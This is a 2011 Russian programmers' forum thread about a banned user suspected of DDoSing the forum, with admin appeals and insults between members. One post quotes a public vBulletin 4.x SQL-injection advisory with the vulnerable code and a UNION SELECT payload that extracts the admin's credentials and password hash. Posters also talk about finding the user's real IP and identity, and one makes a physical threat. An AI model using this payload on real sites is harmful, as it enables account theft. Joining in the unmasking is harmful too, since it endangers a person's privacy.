Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Клуб программистов > О форуме и сайтах клуба
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 09.09.2011, 11:45   #21
MaTBeu
Eclipse Foundation
Старожил
 
Аватар для MaTBeu
 
Регистрация: 19.09.2007
Сообщений: 2,604
По умолчанию

Пользователь voidcore был заблокирован за разжигание личностной розни и призывы к революционному свержению действующего правительства, с использованием шантажа и школьных фраз.

Финита.

Чего с такими панькаться? Не нравится на форуме - вали. Нашелся тут, вендетту устраивать.

"Это интернет, деточка, тут могут послать нах*й." (с) Народная мудрость.

Последний раз редактировалось MaTBeu; 09.09.2011 в 11:52.
MaTBeu вне форума Ответить с цитированием
Старый 09.09.2011, 11:57   #22
Alar
Александр
Администратор
 
Аватар для Alar
 
Регистрация: 28.10.2006
Сообщений: 17,501
По умолчанию

Давайте не будем, ссориться а просто забудем обиды. Ещё раз прошу - давайте не будем брать форум в заложники - найдите способ решить проблемы между собой. можно через меня если лично это не получается. буду благодарен за стабильную работу форума.
Alar вне форума Ответить с цитированием
Старый 09.09.2011, 12:12   #23
misher
Участник клуба
 
Аватар для misher
 
Регистрация: 26.05.2010
Сообщений: 1,648
По умолчанию

Круто, и мой блог уложил... За что? За посты в этой теме...
This world will never be What I expected (c)
misher вне форума Ответить с цитированием
Старый 09.09.2011, 14:26   #24
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

Цитата:
до фени
не надо до меня.
Цитата:
Пепел Феникса, не обижайся, это наверно новый вид троллинга, наверно личное изобретение voidcore.
да я не обижаюсь.
Цитата:
Ну войдет он под новым ником и все дела
насчет нового ника, не знаю, а вот уйти-то есть куда.
Цитата:
найдите способ решить проблемы между собой.
да было бы известно в чем проблема-то..
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 09.09.2011, 14:34   #25
Alar
Александр
Администратор
 
Аватар для Alar
 
Регистрация: 28.10.2006
Сообщений: 17,501
По умолчанию

Кого-то забанить без причин это не выполнимое требование. Если было оскорбление на форуме, то нужно на него указать и я приму меры.

Прошу, ддосеров оставить в покое форум, так как никому падение ресурса пользы не принесёт
Alar вне форума Ответить с цитированием
Старый 09.09.2011, 15:21   #26
Noor
Участник клуба
 
Аватар для Noor
 
Регистрация: 01.11.2006
Сообщений: 1,051
По умолчанию

Интересно,voidcore имеет хоть какое-то отношение к Одноименному форуму? Может это такая пиар акция по переманиванию пользователей ?
Noor вне форума Ответить с цитированием
Старый 09.09.2011, 16:02   #27
misher
Участник клуба
 
Аватар для misher
 
Регистрация: 26.05.2010
Сообщений: 1,648
По умолчанию

это он и есть, я уверен...
This world will never be What I expected (c)
misher вне форума Ответить с цитированием
Старый 09.09.2011, 18:05   #28
asmodey1
Подтвердите свой е-майл
 
Регистрация: 19.12.2010
Сообщений: 808
По умолчанию

Цитата:
Сообщение от Noor Посмотреть сообщение
Интересно,voidcore имеет хоть какое-то отношение к Одноименному форуму? Может это такая пиар акция по переманиванию пользователей ?
Полагаю, это именно он. Раньше он админил на web-hack.ru... Теперь он его закрыл и открыл новый - voidcore.ru
Уж очень хочется бабла нарубить. Только опять пошел по неправильному пути...

З.Ы. Уже давно привык решать проблемы без физического воздействия, но в данном конкретном случае опять кулаки чешутся.
З.Ы.Ы. Слышь, ты, козел ! Слабо в реале встретиться ? Вот ужо я на тебе высплюсь...

Последний раз редактировалось asmodey1; 09.09.2011 в 22:59.
asmodey1 вне форума Ответить с цитированием
Старый 09.09.2011, 22:42   #29
vasek123
Заблокирован
 
Регистрация: 21.11.2008
Сообщений: 4,986
Сообщение

Цитата:
Сообщение от asmodey1 Посмотреть сообщение
Полагаю, это именно он. Раньше он админил на web-hack.ru... Теперь он его закрыл и открыл новый - voidcore.ru
Мдя... Посмотрел, что за сайт- пипец, куча уязвимостей. Например:

PHP код:
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day 
# Google Dork: intitle: powered by Vbulletin 4 
# Date: 20/07/2011 
# Author: FB1H2S     
# Software Link: [[url]http://www.vbulletin.com/][/url] 
# Version: [4.x.x] 
# Tested on: [relevant os] 
# CVE : [[url]http://members.vbulletin.com/][/url] 
  
###################################################################################################### 
Vulnerability
###################################################################################################### 
  
Vbulletin 4.x.=> 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation
  
##################################################################################################### 
Vulnerable Code
##################################################################################################### 
  
File:    /vbforum/search/type/socialgroupmessage.php 
Line No
388 
Paramater 
messagegroupid 
  
  
  
          
        
if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0
  
        { 
  
            
$value $registry->GPC['messagegroupid']; 
  
            if (!
is_array($value)) 
  
            { 
  
                
$value = array($value); 
  
            } 
  
  
  
            if (!(
in_array(' ',$value) OR in_array('',$value))) 
  
            { 
  
                if (
$rst $vbulletin->db->query_read(
  
                    SELECT socialgroup.name 
  
                    FROM " 
TABLE_PREFIX."socialgroup AS socialgroup 
  
--->                 WHERE socialgroup.groupid IN (" 
implode(', '$value) .")"
  
                  
            } 
  
  
  
############################################################################################ 
Exploitation
############################################################################################ 
Post data on: -->search.php?search_type=
          
--> Search Single Content Type 
  
Keywords 
:   Valid Group Message 
  
Search Type 
Group Messages  
  
Search in Group 
Valid Group Id 
  
&messagegroupid[0]=UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,saltFROM user WHERE userid=1
  
########################################################################################## 
More Details
########################################################################################## 
[url]Http://www.Garage4Hackers.com[/url] 
[url]http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day[/url] 
  
  
########################################################################################### 
Note
########################################################################################### 
  
Funny part was thata similar bug was found in the same modulesearch query two months backAny way Vbulletin has released a patch as it was reported to them by altexhence 
customers are safe except those lowsy Admins
. And this bug is for people to play with the many Nulled VB sites out there" Say No to Piracy Disclosure "
http://www.exploit-db.com/exploits/17555/

Мдя... Кулхацкер, блин

Неплохо- бы узнать IP- шник(а еще лучше, реальные данные) этого voidcore...

Цитата:
Сообщение от misher Посмотреть сообщение
IP уже не катит... Если кто-то будет что-то делать даже ребенок теперь догадается про прокси...
Так я про реальный IP!!!

Последний раз редактировалось vasek123; 09.09.2011 в 23:36.
vasek123 вне форума Ответить с цитированием
Старый 09.09.2011, 22:57   #30
asmodey1
Подтвердите свой е-майл
 
Регистрация: 19.12.2010
Сообщений: 808
По умолчанию

Айпишник его есть у любого модера, но наверняка он ходит через прокси...
asmodey1 вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
срочно! кто работал с f1book linarka Общие вопросы Delphi 1 11.06.2011 15:31
4 задачи паскаль ООП. Срок вторник днем по москве thebestneo Фриланс 2 21.12.2010 13:03
Кто работал с OpenCV? belomorinka Общие вопросы C/C++ 0 24.07.2010 20:21
создали на бесплатном сервере форум,раскрутили,но случились сбои на серваке и форум перестал работать Тырц WordPress и другие CMS 17 17.09.2009 20:22
Кто работал с DelphiX? selenux Общие вопросы Delphi 0 16.11.2006 15:57